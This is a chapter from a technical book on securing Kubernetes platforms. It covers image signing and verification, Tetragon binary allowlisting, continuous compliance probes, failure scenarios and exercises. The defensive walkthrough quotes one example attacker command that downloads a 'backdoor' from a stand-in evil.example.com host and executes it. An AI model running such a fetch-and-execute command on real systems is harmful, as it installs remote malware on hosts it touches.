Chapter 14: Supply Chain and Compliance

A perfectly secured network is useless if the service running inside it is a compromised image. And a perfectly designed security architecture is useless if you can’t prove it’s working.

This chapter covers two concerns that bookend the derivation pipeline: the supply chain (is the code trustworthy before it runs?) and compliance (can you prove the security model is working after it’s deployed?). The decisions:

  • Where in the chain do you verify trust? (At build time? At the registry? At derivation time? At runtime? All four?)
  • How do you prove security is working? (Quarterly audits with spreadsheets? Or continuous evaluation with probes and evidence?)

From code to running binary, four links:

1. Build. CI builds the container image and signs it with a cosign private key. The signature proves a specific key signed a specific image digest. The signature is stored alongside the image in the registry as an OCI artifact.

2. Registry. The image and its signature are stored. Content-addressable digests (@sha256:abc123) ensure immutability — different content produces a different digest. Tags (v1.2.3) are mutable and can be overwritten. The platform rejects tags by default.

3. Derivation time. The platform verifies the image signature against TrustPolicy CRDs and evaluates Cedar DeployImage authorization before producing any Kubernetes resources. Unsigned images never produce a Deployment. Unauthorized images never produce an ExternalSecret. The derivation pipeline stops at the first gate.

4. Runtime. The image is verified and authorized, the Deployment is created, the pod runs. But the image can still execute binaries not in the original image — download a binary from the internet, run a shell command, execute dynamically-fetched code. Tetragon intercepts execve syscalls via eBPF and blocks binaries not on the allowlist.

Each link catches a different failure. A compromised build produces a signed-but-malicious image (caught at runtime by Tetragon if the binary isn’t on the allowlist, or not caught if the malicious code runs within an allowed binary). Registry tampering replaces an image tag (caught at derivation time by digest enforcement). A bad policy admits an unsigned image (caught at derivation time by TrustPolicy verification). A runtime escape executes an unauthorized binary (caught by Tetragon).

No single link is sufficient. The chain is defense in depth applied to the supply chain.

The TrustPolicy CRD maps signing keys to registries:

apiVersion: lattice.dev/v1alpha1
kind: TrustPolicy
metadata:
  name: internal-registry
spec:
  registry: registry.example.com
  cosign:
    publicKey:
      secretRef: signing-keys/cosign-public

At derivation time, the pipeline verifies each container image against the applicable TrustPolicy. The verification checks cosign signatures against the configured public key. If the image is signed, the DeployImage Cedar gate evaluates whether this service is authorized to deploy it.

Verification caching. Cosign verification fetches the signature from the registry and verifies the cryptographic signature — not free at scale. The reference implementation caches results: 5 minutes for verified images, 60 seconds for failed verifications. Concurrent verifications of the same image are coalesced — one verification runs, others wait for the result.
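The caching behavior described above can be sketched as a small TTL cache with request coalescing. This is a minimal sketch, not the reference implementation's actual code; the class name, the `verify_fn` callback, and the locking scheme are assumptions:

```python
import threading
import time

class VerificationCache:
    """TTL cache for image verification results with request coalescing.

    Illustrative sketch: verify_fn stands in for the real cosign check.
    """
    VERIFIED_TTL = 300   # 5 minutes for verified images
    FAILED_TTL = 60      # 60 seconds for failed verifications

    def __init__(self, verify_fn):
        self._verify_fn = verify_fn
        self._results = {}    # digest -> (verified, expires_at)
        self._inflight = {}   # digest -> Event, for coalescing
        self._lock = threading.Lock()

    def verify(self, digest):
        while True:
            with self._lock:
                entry = self._results.get(digest)
                if entry and entry[1] > time.monotonic():
                    return entry[0]          # fresh cached result
                event = self._inflight.get(digest)
                if event is None:
                    # No verification in flight: this caller runs it.
                    event = threading.Event()
                    self._inflight[digest] = event
                    break
            event.wait()                     # coalesce: wait for the runner
        try:
            verified = self._verify_fn(digest)
            ttl = self.VERIFIED_TTL if verified else self.FAILED_TTL
            with self._lock:
                self._results[digest] = (verified, time.monotonic() + ttl)
            return verified
        finally:
            with self._lock:
                del self._inflight[digest]
            event.set()                      # wake coalesced waiters
```

Coalescing matters under deployment bursts: when twenty pods of the same image derive at once, one verification runs and nineteen callers wait for its result.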

Digest enforcement. Tags are mutable — v1.2.3 can be overwritten. Digests (@sha256:abc123) are content-addressable. The AllowTagReference Cedar gate defaults to deny: images must use digests. Teams migrating from tag-based workflows can request an explicit permit.
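The digest check itself is a one-line pattern match. A minimal sketch of the gate's default-deny behavior, with illustrative function names (the actual AllowTagReference evaluation happens in Cedar):

```python
import re

# An OCI content digest suffix: "@sha256:" followed by 64 hex characters.
_DIGEST_RE = re.compile(r"@sha256:[0-9a-f]{64}$")

def is_digest_reference(image_ref: str) -> bool:
    """True if the reference is pinned by content digest, not a mutable tag."""
    return bool(_DIGEST_RE.search(image_ref))

def check_image_reference(image_ref: str, allow_tags: bool = False):
    """Default-deny: tag references are rejected unless explicitly permitted."""
    if is_digest_reference(image_ref):
        return ("permit", "digest-pinned")
    if allow_tags:
        return ("permit", "tag allowed by explicit permit")
    return ("deny", "mutable tag reference; pin by @sha256 digest")
```

The `allow_tags` flag models the explicit permit a migrating team would request.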

The trade-off. Image verification adds latency to the derivation pipeline. Cache misses require a network call to the registry. If the registry is slow or unreachable, verification blocks derivation. The caching mitigates this for steady-state (most images are already verified) but cold starts (new images, cleared cache) are slower.

Tool alternatives. The reference implementation uses cosign (Sigstore). Notation (Notary v2) is the OCI-standard alternative. Docker Content Trust is legacy. The principle is the same: verify at derivation time, refuse to produce resources for unverified images.

Keyless signing and Rekor. Cosign supports keyless signing — the signer authenticates with an OIDC identity (GitHub Actions, Google Workload Identity) and receives a short-lived certificate from Sigstore’s Fulcio CA. The signature and certificate are logged in Rekor, Sigstore’s transparency log. Verification checks the Rekor log to confirm the signature was created during the certificate’s validity window. This eliminates long-lived signing keys but adds a dependency: if Rekor is unreachable, keyless verification fails. The reference implementation uses key-based signing (a cosign private key in CI) to avoid the Rekor dependency. Teams that prefer keyless signing must ensure Rekor reachability from the derivation pipeline — or run a private Rekor instance.

Image verification proves the image is what you expect. It doesn’t prove what happens inside it at runtime.

A verified container can download a binary from the internet, execute a shell command not in the original image, or run dynamically-generated code through an interpreter. Network policies may allow the egress (if the service has an external-service dependency). Image verification passed at derivation time. The attack happens at runtime.

Tetragon intercepts execve syscalls via eBPF. A TracingPolicyNamespaced specifies allowed binaries. The derivation pipeline generates Tetragon policies from the service spec — if the spec declares containers with specific entrypoints, the pipeline produces an allowlist.

A concrete example for a service whose container runs /app/server and uses a shell-based health probe:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicyNamespaced
metadata:
  name: payment-service-allowlist
  namespace: payments
spec:
  kprobes:
  - call: "sys_execve"
    syscall: true
    args:
    - index: 0
      type: "string"
    selectors:
    - matchArgs:
      - index: 0
        operator: "NotIn"
        values:
        - "/app/server"
        - "/bin/sh"
        - "/usr/bin/curl"
      matchActions:
      - action: Signal
        argSig: 9

The policy allows three binaries: the application entrypoint, /bin/sh for the readiness probe, and curl for the health check command. Any other execve call receives SIGKILL.

Violation walkthrough. Suppose an attacker gains code execution inside the payment-service container and runs wget http://evil.example.com/backdoor -O /tmp/backdoor && chmod +x /tmp/backdoor && /tmp/backdoor. The shell invocation (/bin/sh) is allowed — it’s on the allowlist for health probes. But wget is not on the allowlist. When the kernel dispatches the execve syscall for /usr/bin/wget, Tetragon’s eBPF program intercepts it, matches the binary path against the allowlist, finds no match, and sends SIGKILL. The wget process is killed before it executes a single instruction. The pod continues running — the application binary is unaffected — but the unauthorized binary never executes. Tetragon logs the violation with the binary path, PID, container ID, and namespace, providing a forensic trail.

Monitoring vs. enforcement mode. The matchActions field controls what happens on violation. Replace action: Signal with action: Post to run in monitoring mode — violations are logged to Tetragon’s event stream but the binary executes normally. The reference implementation starts every new allowlist in monitoring mode. The operations team reviews violations over a burn-in period (typically one to two weeks in staging, then one week in production). Violations that are false positives — legitimate binaries missing from the allowlist — are added. Once the violation stream shows only true positives (binaries that should genuinely be blocked), the policy transitions to enforcement mode. This staged rollout prevents the allowlist from breaking applications. A bad allowlist in enforcement mode causes health probes to fail, pods to restart, and services to go unavailable. Monitoring mode makes the cost of mistakes a log entry, not an outage.

Allowlist derivation. Developers do not write these policies by hand. The derivation pipeline generates them. The pipeline reads the container image metadata (entrypoint and command from the image config), the pod spec (readiness and liveness probe commands), and any sidecar containers injected by the mesh. From this, it builds the allowlist: the entrypoint binary, any binaries referenced in probe exec commands, and a small set of well-known utilities that the platform explicitly permits (such as /bin/sh when a probe uses exec). The developer declares their service; the pipeline derives the enforcement policy. If a developer changes their health probe from an exec probe to an HTTP probe, the next derivation cycle removes /bin/sh and curl from the allowlist — tightening the policy automatically.
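The derivation step can be sketched as a pure function from spec inputs to an allowlist. The input shapes and the well-known-utility table are assumptions, not the pipeline's actual API:

```python
# Platform-permitted utilities and their assumed paths (illustrative).
WELL_KNOWN = {"sh": "/bin/sh", "curl": "/usr/bin/curl"}

def derive_allowlist(entrypoint, probe_commands):
    """Build a binary allowlist from an entrypoint and exec-probe commands.

    probe_commands is a list of exec commands, e.g.
    [["/bin/sh", "-c", "curl localhost:8080/healthz"]].
    """
    allow = {entrypoint}
    for cmd in probe_commands:
        if not cmd:
            continue
        allow.add(cmd[0])                        # the probe's own binary
        if cmd[0].endswith("sh") and "-c" in cmd:
            # A shell probe runs a command line; allow the binaries it calls.
            script = cmd[cmd.index("-c") + 1]
            for tok in script.split():
                if tok.startswith("/"):
                    allow.add(tok)               # absolute path
                elif tok in WELL_KNOWN:
                    allow.add(WELL_KNOWN[tok])   # resolve well-known name
    return sorted(allow)
```

Because the allowlist is derived rather than hand-written, switching the probe to an HTTP probe tightens it automatically: `derive_allowlist("/app/server", [])` returns just the entrypoint.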

SBOM and vulnerability scanning. Image signing (Section 14.2) proves the image is authentic — it was built by your CI system and has not been tampered with. It does not prove the image is free of known vulnerabilities. The derivation pipeline integrates container scanning tools (Trivy or Grype) to complement signing with vulnerability assessment. When the pipeline resolves an image, it checks for a recent scan result. If no scan exists or the scan is stale, the pipeline triggers one. The scan produces an SBOM (Software Bill of Materials) listing all packages in the image and cross-references them against vulnerability databases. The DeployImage Cedar gate can evaluate scan results: deny deployment if the image contains critical CVEs, warn on high-severity CVEs, or permit with informational notes for lower severities. This creates two complementary gates — signing proves provenance, scanning proves safety — both evaluated before the pipeline produces any Kubernetes resources.
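The scan gate's severity policy can be sketched as a small decision function. The findings shape is a simplified stand-in for a Trivy or Grype report; the thresholds are illustrative:

```python
def evaluate_scan_gate(findings):
    """Map vulnerability scan findings to a DeployImage gate decision.

    findings: list of (cve_id, severity) pairs -- a simplified stand-in
    for a full scanner report.
    """
    severities = {sev.upper() for _, sev in findings}
    if "CRITICAL" in severities:
        return ("deny", "image contains critical CVEs")
    if "HIGH" in severities:
        return ("warn", "image contains high-severity CVEs")
    # Lower severities permit with informational notes.
    return ("permit", "no blocking CVEs")
```

A real gate would express these thresholds as Cedar policy over scan-result attributes, not hardcoded Python.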

The trade-off. Binary allowlisting is hard to get right. Applications have many legitimate binaries: health check scripts, shell commands in readiness probes, interpreters for scripting languages. The allowlist must be permissive enough to not break the application. The staged monitoring-to-enforcement rollout mitigates this, but it requires operational discipline — someone must review violations and approve the transition.

What about interpreted languages? If the allowlist permits /usr/bin/python (because that’s the entrypoint), what can an attacker with code execution inside that process do? They can use Python’s standard library — urllib, socket — but they can’t shell out: subprocess.run() and os.system() invoke execve, which Tetragon intercepts and kills. They can’t run wget, curl, or /bin/sh unless those are on the allowlist. The attacker is confined to the interpreter’s own capabilities, within the network boundaries the other layers enforce — L4 egress only permits declared external-service endpoints, L7 identity enforcement restricts which services they can call. Tetragon isn’t bypassed; it’s working as designed. The layers complement each other: Tetragon prevents lateral binary execution, network policies prevent unauthorized communication, and the combination constrains even an attacker with in-process code execution.

Not every workload needs binary enforcement. It’s most valuable for production workloads with a well-known binary set. Development environments and scripting-heavy workloads may operate in monitoring mode permanently.

Chapter 12 through Section 14.3 described the security architecture. This section addresses how you prove it’s working — not at audit time, but continuously.

The argument. Configuration is evidence of existence. A CiliumClusterwideNetworkPolicy exists — that proves you configured default-deny. But does it prove default-deny is working right now? The policy might be misconfigured. Cilium might be unhealthy. A namespace might have been incorrectly exempted. Configuration proves intent. Continuous evaluation proves effectiveness.

The LatticeComplianceProfile CRD:

apiVersion: lattice.dev/v1alpha1
kind: LatticeComplianceProfile
metadata:
  name: production
spec:
  frameworks:
  - nist-800-53-moderate
  - cis-kubernetes
  - soc-2
  scanInterval: 1h

The compliance controller reconciles this CRD: for each framework, iterate through applicable controls, run probes, record pass/fail with evidence.
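That reconcile pass can be sketched as follows, with illustrative data shapes (framework names map to lists of control probes; each probe returns pass/fail plus evidence):

```python
import datetime

def reconcile(profile, probes, now=None):
    """One reconcile pass of the compliance controller (sketch).

    profile mirrors the LatticeComplianceProfile spec; probes maps
    framework name -> list of (control_id, probe_fn), where probe_fn
    returns (passed, evidence). The shapes are assumptions.
    """
    now = now or datetime.datetime.now(datetime.timezone.utc)
    status = {"lastScanTime": now.isoformat(), "frameworks": {}}
    for framework in profile["spec"]["frameworks"]:
        results = []
        for control_id, probe_fn in probes.get(framework, []):
            passed, evidence = probe_fn()
            results.append({"control": control_id, "passed": passed,
                            "evidence": evidence})
        ok = sum(r["passed"] for r in results)
        status["frameworks"][framework] = {
            "passed": ok,
            "failed": len(results) - ok,
            "total": len(results),
            "controls": results,   # per-control evidence for auditors
        }
    return status
```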

Cedar authorization probes. Submit a known-bad request and verify denial. To verify unsigned images are rejected: submit a DeployImage request with resource.signed: false and verify deny. This proves the policy is loaded, evaluated correctly, and producing the right result — not just that the policy file exists.
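Sketched as a probe function, with an illustrative stand-in for the Cedar evaluation call:

```python
def probe_unsigned_image_denied(authorize):
    """Known-bad authorization probe: unsigned DeployImage must be denied.

    authorize stands in for the platform's Cedar evaluation call and
    returns "permit" or "deny"; the request shape is illustrative.
    """
    decision = authorize(
        principal='Service::"compliance-probe"',
        action='Action::"DeployImage"',
        resource={"signed": False},
    )
    # Only an active deny passes. A missing policy or an engine error
    # that surfaces as anything other than "deny" must fail the probe.
    return decision == "deny", f"DeployImage(signed=false) -> {decision}"
```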

Resource existence probes. Verify expected resources exist and are healthy. Is the default-deny CiliumClusterwideNetworkPolicy present? Is the Istio default-deny AuthorizationPolicy in place? Are Tetragon DaemonSets running on every node?

Configuration probes. Verify cluster-level configuration: API server audit logging enabled, etcd encrypted at rest, kubelet settings per CIS benchmarks.

Deployment readiness probes. Verify security infrastructure is healthy: Cilium agents running on all nodes, Istio control plane reconciling, cert-manager issuing certificates.

Platform features map to compliance controls:

NIST AC-4 (Information Flow Enforcement). Feature: bilateral agreements + CiliumNetworkPolicy + AuthorizationPolicy. Probe: verify default-deny policies exist, submit test traffic between services without bilateral agreements and verify denial.

NIST SC-8 (Transmission Confidentiality and Integrity). Feature: mTLS via mesh, certificate rotation, signing key management. Probe: verify services have valid mTLS certificates and that cert-manager is rotating them on schedule.

CIS 5.3.2 (NetworkPolicy for all namespaces). Feature: default-deny CiliumClusterwideNetworkPolicy. Probe: list non-system namespaces, verify each has at least one CiliumNetworkPolicy.

SOC 2 CC6.1 (Logical access security). Feature: Cedar authorization gates. Probe: submit unauthorized requests and verify denial.
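One of these probes, CIS 5.3.2, can be sketched as a pure function over namespace data. A real probe would query the API server and exempt freshly created namespaces that have no workloads yet; this sketch operates on plain data:

```python
SYSTEM_NAMESPACES = {"kube-system", "kube-public", "kube-node-lease"}

def probe_cis_5_3_2(namespaces, policies_by_namespace):
    """CIS 5.3.2 probe: every non-system namespace has a network policy.

    policies_by_namespace maps namespace -> list of CiliumNetworkPolicy
    names; the input shapes are illustrative.
    """
    missing = sorted(
        ns for ns in namespaces
        if ns not in SYSTEM_NAMESPACES and not policies_by_namespace.get(ns)
    )
    if missing:
        return False, f"namespaces without a CiliumNetworkPolicy: {missing}"
    return True, "all non-system namespaces have at least one policy"
```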

Walk through what happens when the compliance controller runs.

t=0. The controller reads the LatticeComplianceProfile CRD: scan NIST 800-53 Moderate, CIS Kubernetes, and SOC 2. Scan interval: 1 hour. Last scan: 59 minutes ago.

t=1s. NIST AC-4 (Information Flow Enforcement). Probe: verify the default-deny CiliumClusterwideNetworkPolicy exists. The controller queries the API server. The policy exists. Result: pass.

t=2s. NIST AC-4 continued. Probe: submit a test request between two services with no bilateral agreement. The controller creates a short-lived test pod in a dedicated compliance namespace, attempts a connection to a service it has no bilateral agreement with, and verifies the connection is denied (connection timeout or reset, not HTTP 200). The pod is deleted immediately after the test — the compliance scanner itself must not become a lateral movement vector. The compliance namespace should have CiliumNetworkPolicies restricting its own egress to only the specific probe targets (the services under test and the API server), denying all other egress. Probe pods should run with a dedicated ServiceAccount whose RBAC grants only the minimum verbs needed (create/delete test pods, get network policies) and nothing else — no secrets access, no exec, no port-forward. A compromised compliance controller with broad cluster access is a privilege escalation path, not a security tool. Result: pass — default-deny is enforced, not just configured.

t=5s. NIST SC-8 (Transmission Confidentiality and Integrity). Probe: check that all SPIFFE SVIDs in the mesh are valid (not expired, issued by the expected CA). The controller queries istiod’s certificate status. 198 of 200 services have valid SVIDs. 2 services have SVIDs expiring in 3 hours (normal — rotation happens at 75% of lifetime). Result: pass with informational note.

t=10s. CIS 5.3.2 (NetworkPolicy for all namespaces). Probe: list all non-system namespaces. For each, verify at least one CiliumNetworkPolicy exists. 48 of 50 namespaces have policies. 2 namespaces were just created and have no services yet — no policies expected. Result: pass.

t=15s. SOC 2 CC6.1 (Logical access security). Probe: submit a DeployImage request with resource.signed: false to the Cedar engine. Verify the result is deny. Result: pass — unsigned images are rejected.

t=20s. All probes complete. The controller writes the results to the ComplianceProfile status:

status:
  lastScanTime: "2026-04-06T02:00:20Z"
  frameworks:
    nist-800-53-moderate:
      passed: 29
      failed: 0
      total: 29
    cis-kubernetes:
      passed: 4
      failed: 0
      total: 4
    soc-2:
      passed: 5
      failed: 0
      total: 5

All green. The next scan is in 1 hour. Monitoring dashboards scrape this status. If any control fails, an alert fires.

A quarterly audit tests a sample of controls once. A compliance controller tests all controls every scan interval.

A configuration that drifted last week is caught at the next scan, not the next audit. A manual audit produces a PDF. The compliance controller produces a CRD status that monitoring scrapes, dashboards display, and alerts fire on.

The trade-off. Continuous compliance creates alert noise. The controller runs every hour. Every transient failure (pod restarting, certificate about to rotate) is a condition. The platform must distinguish between alerts (page someone — default-deny policy deleted), warnings (dashboard — Tetragon DaemonSet at 9/10 nodes), and informational (log — certificate rotating in 7 days). Without this classification, teams ignore all compliance alerts.
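The classification can be sketched as a small rule table. The condition names and rules here are illustrative, not the platform's actual taxonomy:

```python
PAGE, WARN, INFO = "page", "warn", "info"

def classify(kind, detail):
    """Route a compliance condition to page, warning, or informational."""
    if kind in {"default-deny-missing", "cedar-unexpected-permit"}:
        return PAGE                  # a security boundary is actively broken
    if kind == "daemonset-degraded":
        # Rolling upgrades self-heal; page only when nothing is ready.
        return PAGE if detail.get("ready", 0) == 0 else WARN
    if kind in {"cert-rotation-due", "namespace-no-services"}:
        return INFO                  # expected, in-progress conditions
    return WARN                      # unknown conditions get a human look
```

The key design choice is the final line: an unclassified condition defaults to a warning that a human triages, not a page and not silence.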

The limitation. Continuous compliance automates evaluation. It does not replace auditors. Auditors validate that the probes test the right things, that the control mapping is correct, and that the evidence is meaningful. The controller is a tool for the audit, not a replacement for it.

Scenario: stale verification cache. A signing key is compromised. The security team revokes it by updating the TrustPolicy CRD. But the verification cache still holds “verified” results for images signed with the compromised key — cached for 5 minutes.

During those 5 minutes, a developer deploys a new service using an image signed by the compromised key. The cache returns “verified.” The DeployImage gate passes. The Deployment is created. A compromised image is running in the cluster.

After 5 minutes, the cache entry expires. The next derivation cycle re-verifies the image against the updated TrustPolicy. The verification fails (key revoked). The status reports ImageVerified: False. But the Deployment already exists — the all-or-nothing rule doesn’t tear down running services on re-derivation failure (Chapter 8, Section 8.7).

The gap: A 5-minute window where compromised images can be deployed after key revocation. The mitigation: event-driven cache invalidation (watch TrustPolicy changes, clear affected cache entries immediately) reduces the window to seconds. The reference implementation uses TTL-based expiry — which means the 5-minute window is real. Platforms with strict requirements should implement event-driven invalidation.
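The event-driven mitigation can be sketched as a watch handler that reacts to TrustPolicy changes; the cache shape and names are illustrative:

```python
def on_trust_policy_change(cache, trust_policy):
    """Event-driven invalidation: a TrustPolicy update drops every cached
    verification result for images from the affected registry.

    cache maps image reference -> cached result (sketch).
    """
    registry = trust_policy["spec"]["registry"]
    stale = [ref for ref in cache if ref.startswith(registry + "/")]
    for ref in stale:
        del cache[ref]
    return stale   # invalidated references, useful for audit logging
```

Wired to a Kubernetes watch on TrustPolicy objects, this shrinks the vulnerability window from the cache TTL to watch-event latency, typically seconds.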

Scenario: compliance alert fatigue. The compliance controller runs every hour. It reports 38 controls across 3 frameworks. One month in, the team has 50 compliance conditions in their monitoring dashboard. Most are transient: a Tetragon DaemonSet briefly at 9/10 nodes during a rolling upgrade, a certificate at 80% lifetime (normal rotation), a new namespace with no services yet.

The team starts ignoring all compliance alerts. Then the default-deny CiliumClusterwideNetworkPolicy is accidentally deleted during a debugging session. The compliance controller catches it on the next scan — but the alert sits among 49 other conditions that the team has trained themselves to ignore. For 59 minutes, the cluster has no default-deny.

The lesson: Continuous compliance is only valuable if alert classification is correct. Critical failures (default-deny policy deleted, Cedar policy evaluation returning unexpected results) must page someone. Informational conditions (certificate rotating on schedule, DaemonSet rolling) must be dashboard-only. The compliance controller must distinguish between “something is broken” and “something is in progress.” Without this classification, continuous compliance creates noise that masks real failures.

The security architecture:

  • Chapter 12: Default-deny posture, four enforcement layers, concrete request walkthrough showing all layers in action.
  • Chapter 13: Cedar authorization at derivation time, bilateral network agreements, cross-service policy compilation, debugging denials.
  • Chapter 14: Supply chain trust chain (build → registry → derivation → runtime), continuous compliance verification with probes and evidence.

Part V covers networking — the service mesh and identity infrastructure that the network and identity enforcement layers depend on, multi-cluster mesh, and edge networking.

14.1. [M10] A developer pushes an unsigned image and references it by digest in their LatticeService spec. At which step in the derivation pipeline does the failure occur? What does the status report? What does the developer need to do?

14.2. [H30] The verification cache stores “verified” for 5 minutes. A signing key is compromised and revoked. Images signed by the compromised key are cached as “verified” for up to 5 minutes. Design the cache invalidation: how does key revocation propagate? What is the maximum vulnerability window?

14.3. [R] The trust chain has four links. If you could invest in only two, which two provide the most coverage? Does the answer change for: (a) insider threat, (b) external attacker, (c) supply chain compromise of a dependency?

14.4. [M10] Tetragon blocks binary execution. A container’s readiness probe runs /bin/sh -c "curl localhost:8080/healthz". The allowlist doesn’t include /bin/sh or curl. The pod never becomes Ready. How should the derivation pipeline generate allowlists that include probe binaries automatically?

14.5. [H30] A Cedar authorization probe submits DeployImage with resource.signed: false and expects deny. The probe returns permit. List the possible causes in order of likelihood: (a) the Cedar policy has a bug, (b) the policy was deleted, (c) the probe is misconfigured, (d) the policy engine has a bug. For each cause, describe the detection and remediation.

14.6. [R] The compliance controller scans every hour. Between scans, someone deletes the default-deny CiliumClusterwideNetworkPolicy. For up to 59 minutes, default-deny is gone. Should the compliance controller scan more frequently (cost: more API server load)? Should a different mechanism prevent the deletion (cost: complexity)? Should the default-deny policy be owned by a controller that reconciles it continuously (cost: another controller to maintain)?